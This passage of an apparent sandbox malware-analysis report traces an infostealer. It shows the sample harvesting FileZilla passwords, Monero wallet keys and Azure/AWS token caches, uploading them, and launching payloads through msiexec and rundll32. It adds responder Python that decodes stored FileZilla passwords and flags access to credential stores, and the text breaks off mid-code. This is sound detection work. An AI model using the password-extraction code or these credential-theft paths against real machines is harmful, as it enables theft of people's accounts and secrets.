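The API trace above is the FileZilla harvesting routine of this sample: it reads `\AppData\Roaming\FileZilla\recentservers.xml` through the read-whole-file helper at 003D99C0, locates `<Host>`, `<Port>`, `<User>` and `<Pass encoding="base64">` with StrStrA, and concatenates a record with the literal labels `browser: FileZilla`, `profile: null`, `url: `, `login: ` and `password: `. The following Python is an added example for incident responders, not code from the report or from the malware: given a copy of a victim's recentservers.xml it lists every account the stealer could have taken, base64-decodes the stored passwords so the owners know what to rotate, and rebuilds the record in the format the trace assembles. The sample XML is constructed for the example; the field separators between the labels (referenced only by address, 003F1678 and so on, in the trace) are assumed to be newlines and `:`; and the handling of a plaintext `<Pass>` element written by older FileZilla releases is an assumption outside this report.

```python
"""Enumerate credentials a stealer would harvest from FileZilla recentservers.xml.

Added example for responders; not the sample's own code. Assumptions: the
record separators (only addresses in the trace) are ':' and newlines, and an
un-attributed <Pass> element holds a plaintext password (older FileZilla).
"""
import base64
import binascii
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample of %APPDATA%\FileZilla\recentservers.xml (not from the report).
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host><Port>21</Port><Protocol>0</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host><Port>22</Port><Protocol>1</Protocol>
      <User>backup</User>
      <Pass>plaintext-legacy</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>anon.example.test</Host><Port>21</Port>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


@dataclass
class FzServer:
    host: str
    port: int
    user: Optional[str]        # None when no <User> element is present
    password: Optional[str]    # None when absent or undecodable
    note: str = ""             # how the password was stored, or why it is missing


def decode_pass(pass_elem: ET.Element) -> Tuple[Optional[str], str]:
    """Return (password, storage_note) for one <Pass> element.

    encoding="base64" is what the trace searches for; a <Pass> without an
    encoding attribute is treated as plaintext (assumed legacy format).
    """
    raw = pass_elem.text or ""
    enc = pass_elem.get("encoding")
    if enc == "base64":
        try:
            return base64.b64decode(raw, validate=True).decode("utf-8"), "base64"
        except (binascii.Error, UnicodeDecodeError):
            return None, "undecodable base64"
    if enc is None:
        return raw, "plaintext"
    return None, f"unsupported encoding {enc!r}"


def harvest(xml_text: str) -> List[FzServer]:
    """Parse every <Server> entry the way a responder should: with a real XML
    parser, so entries with no <User>/<Pass> (anonymous logins) stay separate
    instead of bleeding into the next server as a substring scan might."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    servers = []
    for srv in root.iter("Server"):
        host = (srv.findtext("Host") or "").strip()
        port_txt = (srv.findtext("Port") or "").strip()
        port = int(port_txt) if port_txt.isdigit() else 0
        user = srv.findtext("User")
        pass_elem = srv.find("Pass")
        password, note = (None, "no password stored")
        if pass_elem is not None:
            password, note = decode_pass(pass_elem)
        servers.append(FzServer(host, port, user, password, note))
    return servers


def format_stealer_record(srv: FzServer) -> str:
    """Rebuild the record the trace builds with lstrcat (labels are verbatim from
    the trace; the separators between them are assumed)."""
    return "\n".join([
        "browser: FileZilla",
        "profile: null",
        f"url: {srv.host}:{srv.port}",
        f"login: {srv.user or ''}",
        f"password: {srv.password or ''}",
    ])


def exposed_accounts(servers: List[FzServer]) -> List[Tuple[str, int, str]]:
    """Accounts with a recoverable username and password: these need rotation."""
    return [(s.host, s.port, s.user) for s in servers if s.user and s.password]


if __name__ == "__main__":
    found = harvest(SAMPLE_RECENTSERVERS)
    for s in found:
        print(f"{s.host}:{s.port} user={s.user!r} ({s.note})")
    print("rotate:", exposed_accounts(found))
    print(format_stealer_record(found[0]))
```

Run it against the real file from the affected profile rather than the constructed sample; every tuple returned by `exposed_accounts` is a credential to treat as compromised, whether or not the C2 upload in the next trace succeeded.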
                      APIs
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003D4839
                        • Part of subcall function 003D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003D4849
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003D59F8
                      • StrCmpCA.SHLWAPI(?,0108E978), ref: 003D5A13
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003D5B93
                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0108E838,00000000,?,0108A610,00000000,?,003F1A1C), ref: 003D5E71
                      • lstrlen.KERNEL32(00000000), ref: 003D5E82
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 003D5E93
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003D5E9A
                      • lstrlen.KERNEL32(00000000), ref: 003D5EAF
                      • lstrlen.KERNEL32(00000000), ref: 003D5ED8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003D5EF1
                      • lstrlen.KERNEL32(00000000,?,?), ref: 003D5F1B
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003D5F2F
                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 003D5F4C
                      • InternetCloseHandle.WININET(00000000), ref: 003D5FB0
                      • InternetCloseHandle.WININET(00000000), ref: 003D5FBD
                      • HttpOpenRequestA.WININET(00000000,0108E7F8,?,0108E0E8,00000000,00000000,00400100,00000000), ref: 003D5BF8
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                      • InternetCloseHandle.WININET(00000000), ref: 003D5FC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
• Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 874700897-2180234286
                      • Opcode ID: d5410a6d087c8570322e2e976fd8b683e9a7817cdd33a98069751d29eed22ec3
                      • Instruction ID: 375372bbf3ff134052532174738f249b18add0a921433aa85107494fb0a2a41f
                      • Opcode Fuzzy Hash: d5410a6d087c8570322e2e976fd8b683e9a7817cdd33a98069751d29eed22ec3
                      • Instruction Fuzzy Hash: 11123F72820568AADB16EBA1DC95FEEB379BF14700F014299F106660D2EF703B49CF65
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003E8B60: GetSystemTime.KERNEL32(003F0E1A,0108A3A0,003F05AE,?,?,003D13F9,?,0000001A,003F0E1A,00000000,?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003E8B86
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003DCF83
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003DD0C7
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003DD0CE
                      • lstrcat.KERNEL32(?,00000000), ref: 003DD208
                      • lstrcat.KERNEL32(?,003F1478), ref: 003DD217
                      • lstrcat.KERNEL32(?,00000000), ref: 003DD22A
                      • lstrcat.KERNEL32(?,003F147C), ref: 003DD239
                      • lstrcat.KERNEL32(?,00000000), ref: 003DD24C
                      • lstrcat.KERNEL32(?,003F1480), ref: 003DD25B
                      • lstrcat.KERNEL32(?,00000000), ref: 003DD26E
                      • lstrcat.KERNEL32(?,003F1484), ref: 003DD27D
                      • lstrcat.KERNEL32(?,00000000), ref: 003DD290
                      • lstrcat.KERNEL32(?,003F1488), ref: 003DD29F
                      • lstrcat.KERNEL32(?,00000000), ref: 003DD2B2
                      • lstrcat.KERNEL32(?,003F148C), ref: 003DD2C1
                      • lstrcat.KERNEL32(?,00000000), ref: 003DD2D4
                      • lstrcat.KERNEL32(?,003F1490), ref: 003DD2E3
                        • Part of subcall function 003EA820: lstrlen.KERNEL32(003D4F05,?,?,003D4F05,003F0DDE), ref: 003EA82B
                        • Part of subcall function 003EA820: lstrcpy.KERNEL32(003F0DDE,00000000), ref: 003EA885
                      • lstrlen.KERNEL32(?), ref: 003DD32A
                      • lstrlen.KERNEL32(?), ref: 003DD339
                        • Part of subcall function 003EAA70: StrCmpCA.SHLWAPI(01088F80,003DA7A7,?,003DA7A7,01088F80), ref: 003EAA8F
                      • DeleteFileA.KERNEL32(00000000), ref: 003DD3B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                      • String ID:
                      • API String ID: 1956182324-0
                      • Opcode ID: 915608a433d38909fb3d9803dd4354a40a25da62697460c621b42ab540713dd0
                      • Instruction ID: 90519a171b2dfd2b13d9f0acccf671829dddaff815c48a055b20206ebf1cd386
                      • Opcode Fuzzy Hash: 915608a433d38909fb3d9803dd4354a40a25da62697460c621b42ab540713dd0
                      • Instruction Fuzzy Hash: 6BE16F72910158ABCB06EBE1DD96EEE7779BF14300F054219F107AA0D2DE34BE06CB62
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0108CFA0,00000000,?,003F144C,00000000,?,?), ref: 003DCA6C
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 003DCA89
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 003DCA95
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 003DCAA8
                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 003DCAD9
                      • StrStrA.SHLWAPI(?,0108CEE0,003F0B52), ref: 003DCAF7
                      • StrStrA.SHLWAPI(00000000,0108CEF8), ref: 003DCB1E
                      • StrStrA.SHLWAPI(?,0108D6A0,00000000,?,003F1458,00000000,?,00000000,00000000,?,01088E70,00000000,?,003F1454,00000000,?), ref: 003DCCA2
                      • StrStrA.SHLWAPI(00000000,0108D740), ref: 003DCCB9
                        • Part of subcall function 003DC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 003DC871
                        • Part of subcall function 003DC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 003DC87C
                      • StrStrA.SHLWAPI(?,0108D740,00000000,?,003F145C,00000000,?,00000000,01088EB0), ref: 003DCD5A
                      • StrStrA.SHLWAPI(00000000,01089200), ref: 003DCD71
                        • Part of subcall function 003DC820: lstrcat.KERNEL32(?,003F0B46), ref: 003DC943
                        • Part of subcall function 003DC820: lstrcat.KERNEL32(?,003F0B47), ref: 003DC957
                        • Part of subcall function 003DC820: lstrcat.KERNEL32(?,003F0B4E), ref: 003DC978
                      • lstrlen.KERNEL32(00000000), ref: 003DCE44
                      • CloseHandle.KERNEL32(00000000), ref: 003DCE9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                      • String ID:
                      • API String ID: 3744635739-3916222277
                      • Opcode ID: ffb0dee488d762f55b3bde9ae5f7eddd761f495b068973aa85bb3ec1ac5483cf
                      • Instruction ID: b1511a9bc00c8b743caa4a2412c4f0449ae5ff6074d26ff0769e5767883b144b
                      • Opcode Fuzzy Hash: ffb0dee488d762f55b3bde9ae5f7eddd761f495b068973aa85bb3ec1ac5483cf
                      • Instruction Fuzzy Hash: EEE14071810558ABDB16EBE1DC91FEEB779AF14300F054259F1066B1D2EF307A4ACB62
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • RegOpenKeyExA.ADVAPI32(00000000,0108B3E8,00000000,00020019,00000000,003F05B6), ref: 003E83A4
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003E8426
                      • wsprintfA.USER32 ref: 003E8459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 003E847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 003E848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 003E8499
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                      • String ID: - $%s\%s$?
                      • API String ID: 3246050789-3278919252
                      • Opcode ID: 4bf00cf86ed6f49f2a834d11f8708c8a85bd4ad1d1096553d99334b7ea744540
                      • Instruction ID: 3f83140235a9213154f4fda35dc3e57727f336a7646bc1c5d0f5b25824618d7e
                      • Opcode Fuzzy Hash: 4bf00cf86ed6f49f2a834d11f8708c8a85bd4ad1d1096553d99334b7ea744540
                      • Instruction Fuzzy Hash: 84814C7191116CABEB29DF61CC81FEAB7B9FF08700F008299E109A6180DF716B85CF91
                      APIs
                        • Part of subcall function 003E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003E8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 003E4DB0
                      • lstrcat.KERNEL32(?,\.azure\), ref: 003E4DCD
                        • Part of subcall function 003E4910: wsprintfA.USER32 ref: 003E492C
                        • Part of subcall function 003E4910: FindFirstFileA.KERNEL32(?,?), ref: 003E4943
                      • lstrcat.KERNEL32(?,00000000), ref: 003E4E3C
                      • lstrcat.KERNEL32(?,\.aws\), ref: 003E4E59
                        • Part of subcall function 003E4910: StrCmpCA.SHLWAPI(?,003F0FDC), ref: 003E4971
                        • Part of subcall function 003E4910: StrCmpCA.SHLWAPI(?,003F0FE0), ref: 003E4987
                        • Part of subcall function 003E4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003E4B7D
                        • Part of subcall function 003E4910: FindClose.KERNEL32(000000FF), ref: 003E4B92
                      • lstrcat.KERNEL32(?,00000000), ref: 003E4EC8
                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 003E4EE5
                        • Part of subcall function 003E4910: wsprintfA.USER32 ref: 003E49B0
                        • Part of subcall function 003E4910: StrCmpCA.SHLWAPI(?,003F08D2), ref: 003E49C5
                        • Part of subcall function 003E4910: wsprintfA.USER32 ref: 003E49E2
                        • Part of subcall function 003E4910: PathMatchSpecA.SHLWAPI(?,?), ref: 003E4A1E
                        • Part of subcall function 003E4910: lstrcat.KERNEL32(?,0108E948), ref: 003E4A4A
                        • Part of subcall function 003E4910: lstrcat.KERNEL32(?,003F0FF8), ref: 003E4A5C
                        • Part of subcall function 003E4910: lstrcat.KERNEL32(?,?), ref: 003E4A70
                        • Part of subcall function 003E4910: lstrcat.KERNEL32(?,003F0FFC), ref: 003E4A82
                        • Part of subcall function 003E4910: lstrcat.KERNEL32(?,?), ref: 003E4A96
                        • Part of subcall function 003E4910: CopyFileA.KERNEL32(?,?,00000001), ref: 003E4AAC
                        • Part of subcall function 003E4910: DeleteFileA.KERNEL32(?), ref: 003E4B31
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                      • API String ID: 949356159-974132213
                      • Opcode ID: 97a0d58c23a03e6bb3667c0441e0505f14d7bcfed289e9c459fe3a8b0051ecd6
                      • Instruction ID: 0b9342a0e789e59c4cd0638f8f8630e7a112b9b264e66ff22e2df86d0816eee3
                      • Opcode Fuzzy Hash: 97a0d58c23a03e6bb3667c0441e0505f14d7bcfed289e9c459fe3a8b0051ecd6
                      • Instruction Fuzzy Hash: 1241DBBAA40318A7DB51F7B0EC47FED7339AB24704F004554B249661C1EEB467C98B92
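The function above is the cloud-credential harvester: SHGetFolderPathA is called with CSIDL 0x1C (CSIDL_LOCAL_APPDATA), the suffixes \.azure\, \.aws\ and \.IdentityService\ are appended with lstrcat, each directory is walked with FindFirstFileA/FindNextFileA over *.*, file names are matched with PathMatchSpecA (msal.cache is named explicitly), and matches are copied with CopyFileA and later removed with DeleteFileA; the Azure\.azure, Azure\.aws and Azure\.IdentityService strings look like the staging subfolders the copies go into. The Python below is an added example of triaging file-access telemetry for that behaviour; it is not code from the sample or from Joe Sandbox. It generalises past the sample by matching the three directory names anywhere in a path, because the real Azure and AWS CLIs keep their stores under %USERPROFILE% as well as under %LOCALAPPDATA%; the event format, the process allow-list and the sample events are constructed for illustration.

```python
"""Triage file-access events for the cloud-credential stores this sample enumerates.

Added example for this report, not code from the sample or from Joe Sandbox.
Grounded in the report: CSIDL 0x1C (CSIDL_LOCAL_APPDATA) passed to SHGetFolderPathA,
the suffixes \\.azure\\, \\.aws\\, \\.IdentityService\\ and the file name msal.cache.
Constructed for illustration: the event format, the process allow-list, the events.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

CSIDL_LOCAL_APPDATA = 0x1C                             # value seen in the SHGetFolderPathA call
TARGET_DIRS = (".azure", ".aws", ".IdentityService")   # lstrcat suffixes in the report
TARGET_FILES = ("msal.cache",)                         # file name singled out in the strings


def cloud_credential_dirs(local_appdata: str) -> List[str]:
    """Rebuild the directories the sample scans, as <LOCALAPPDATA>\\<suffix>\\.

    Assumption: the lstrcat calls append each suffix to the SHGetFolderPathA
    result before the FindFirstFileA("...\\*.*") enumeration.
    """
    base = local_appdata.rstrip("\\")
    return [f"{base}\\{d}\\" for d in TARGET_DIRS]


# Generalisation beyond the sample: match the directory names anywhere in a path,
# because the real Azure and AWS CLIs keep these stores under %USERPROFILE% too.
_DIR_RE = re.compile(r"\\(\.azure|\.aws|\.IdentityService)\\", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    timestamp: str
    image: str
    target: str
    reason: str


def classify_target(path: str) -> Optional[str]:
    """Why a target path matters, or None if it is not a cloud credential store."""
    m = _DIR_RE.search(path)
    if m is None:
        return None
    name = ntpath.basename(path).lower()
    if name in TARGET_FILES:
        return f"token cache {name} under {m.group(1)}"
    return f"file under {m.group(1)} credential directory"


def parse_event(line: str) -> Tuple[str, str, str]:
    """Constructed format: '<iso-time>|<process image path>|<target file path>'."""
    ts, image, target = line.rstrip("\n").split("|", 2)
    return ts, image, target


def triage(lines: Iterable[str], allowed_images: Iterable[str]) -> List[Finding]:
    """Flag credential-store accesses by any image not on the full-path allow-list."""
    allowed = {a.lower() for a in allowed_images}
    findings = []
    for line in lines:
        ts, image, target = parse_event(line)
        reason = classify_target(target)
        if reason is None or image.lower() in allowed:
            continue
        findings.append(Finding(ts, image, target, reason))
    return findings


# Constructed events: the first two mimic the sample (running from Temp) touching the
# stores; the third is a legitimate AWS CLI read; the fourth is unrelated.
SAMPLE_EVENTS = [
    "2024-10-13T10:01:02Z|C:\\Users\\bob\\AppData\\Local\\Temp\\file.exe|"
    "C:\\Users\\bob\\AppData\\Local\\.azure\\azureProfile.json",
    "2024-10-13T10:01:03Z|C:\\Users\\bob\\AppData\\Local\\Temp\\file.exe|"
    "C:\\Users\\bob\\AppData\\Local\\.IdentityService\\msal.cache",
    "2024-10-13T10:02:00Z|C:\\Program Files\\Amazon\\AWSCLIV2\\aws.exe|"
    "C:\\Users\\bob\\.aws\\credentials",
    "2024-10-13T10:03:00Z|C:\\Windows\\explorer.exe|C:\\Users\\bob\\Documents\\notes.txt",
]
# Constructed allow-list: full image paths of tools expected to read these stores.
ALLOWED_IMAGES = [
    "C:\\Program Files\\Amazon\\AWSCLIV2\\aws.exe",
    "C:\\Program Files\\Microsoft SDKs\\Azure\\CLI2\\python.exe",
]

if __name__ == "__main__":
    for d in cloud_credential_dirs("C:\\Users\\bob\\AppData\\Local"):
        print("scan target:", d)
    for f in triage(SAMPLE_EVENTS, ALLOWED_IMAGES):
        print(f"{f.timestamp} {f.image} -> {f.target}: {f.reason}")
```

The allow-list is keyed on full image paths rather than base names so that a copy of python.exe dropped in Temp does not pass as the Azure CLI; it still does not help if the stealer injects into an allowed process, so a hit on msal.cache or on the .azure/.aws directories from any process should be correlated with the process ancestry and with the outbound HTTP session the report documents.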
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 003E906C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateGlobalStream
                      • String ID: image/jpeg
                      • API String ID: 2244384528-3785015651
                      • Opcode ID: 234d7394e9fd7a41e8bf4f313bcab8564c3a729e9bd52a94fe0df2546f05f4db
                      • Instruction ID: d04c666a39fe9cc2381e03e4c8642cae2a1f6f23f392802a15537dd8d38be196
                      • Opcode Fuzzy Hash: 234d7394e9fd7a41e8bf4f313bcab8564c3a729e9bd52a94fe0df2546f05f4db
                      • Instruction Fuzzy Hash: B17110B5910218ABDF04DFE5DC89FEEB7B9BF48300F148609F615AB294DB34A905CB61
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • ShellExecuteEx.SHELL32(0000003C), ref: 003E31C5
                      • ShellExecuteEx.SHELL32(0000003C), ref: 003E335D
                      • ShellExecuteEx.SHELL32(0000003C), ref: 003E34EA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExecuteShell$lstrcpy
                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                      • API String ID: 2507796910-3625054190
                      • Opcode ID: da78bf17307d3c89b4b600e97af7495d21ca2cb116e9037babeb036f2d9f8f1f
                      • Instruction ID: cce7ae5dbaaa9211fa33086c048ee3cffa97bba2692cdcbd56537cdf316ee063
                      • Opcode Fuzzy Hash: da78bf17307d3c89b4b600e97af7495d21ca2cb116e9037babeb036f2d9f8f1f
                      • Instruction Fuzzy Hash: A4122271C005689ADB1AEB91DC92FEEB779AF14300F514259F5066A1D2EF303B4ACF62
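The three ShellExecuteEx call sites above (cbSize 0x3C, the 32-bit ANSI SHELLEXECUTEINFO) together with the strings /i ", /passive, .msi, .dll and the System32 paths of msiexec.exe and rundll32.exe are the sample's payload launcher: an .msi is handed to msiexec.exe with /i "<file>" /passive, a .dll to rundll32.exe, and the third call site covers the remaining case. The Python below is an added example of the matching process-creation triage; it is not code from the sample or from Joe Sandbox. The command shapes are reconstructed from those strings (the rundll32 entry-point name is not visible in the report), and the event tuples, the user-writable-path heuristic and the sample command lines are constructed.

```python
"""Triage process-creation events for the payload launcher pattern in this function.

Added example for this report, not code from the sample or from Joe Sandbox.
Grounded in the report: the strings '/i "', ' /passive', '.msi', '.dll' and the
System32 paths of msiexec.exe and rundll32.exe around three ShellExecuteEx calls.
Reconstructed (assumption): msiexec.exe /i "<payload>.msi" /passive and
rundll32.exe "<payload>.dll"[,<entry>]; the entry name is not visible in the report.
Constructed: the event tuples, the user-writable heuristic and the sample command lines.
"""
import re
from typing import List, Optional, Tuple

MSIEXEC = "c:\\windows\\system32\\msiexec.exe"
RUNDLL32 = "c:\\windows\\system32\\rundll32.exe"

# Assumption: paths under a user profile or ProgramData are writable by the sample.
_USER_WRITABLE = re.compile(r"^[a-z]:\\(users\\[^\\]+\\|programdata\\)", re.IGNORECASE)


def split_cmdline(cmdline: str) -> List[str]:
    """Minimal Windows argv splitter: whitespace separates, double quotes group."""
    argv, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                argv.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        argv.append("".join(cur))
    return argv


def is_user_writable(path: str) -> bool:
    return _USER_WRITABLE.match(path) is not None


def classify(image: str, cmdline: str) -> Optional[str]:
    """Return a finding for a launcher-style execution, else None."""
    argv = split_cmdline(cmdline)
    if len(argv) < 2:
        return None
    lowered = [a.lower() for a in argv]
    img = image.lower()
    if img == MSIEXEC and "/i" in lowered and "/passive" in lowered:
        # msiexec.exe /i "<payload>.msi" /passive: the payload follows /i
        idx = lowered.index("/i") + 1
        payload = argv[idx] if idx < len(argv) else ""
        if payload.lower().endswith(".msi") and is_user_writable(payload):
            return f"msiexec passive install of {payload}"
    elif img == RUNDLL32:
        # rundll32.exe "<payload>.dll",<entry>: strip the ",entry" part if present
        payload = argv[1].split(",", 1)[0]
        if payload.lower().endswith(".dll") and is_user_writable(payload):
            return f"rundll32 load of {payload}"
    return None


def triage(events: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """(image, cmdline) pairs -> (image, finding) pairs for the ones that match."""
    out = []
    for image, cmdline in events:
        finding = classify(image, cmdline)
        if finding is not None:
            out.append((image, finding))
    return out


# Constructed events: two that mimic the sample's launcher, two benign look-alikes.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\msiexec.exe",
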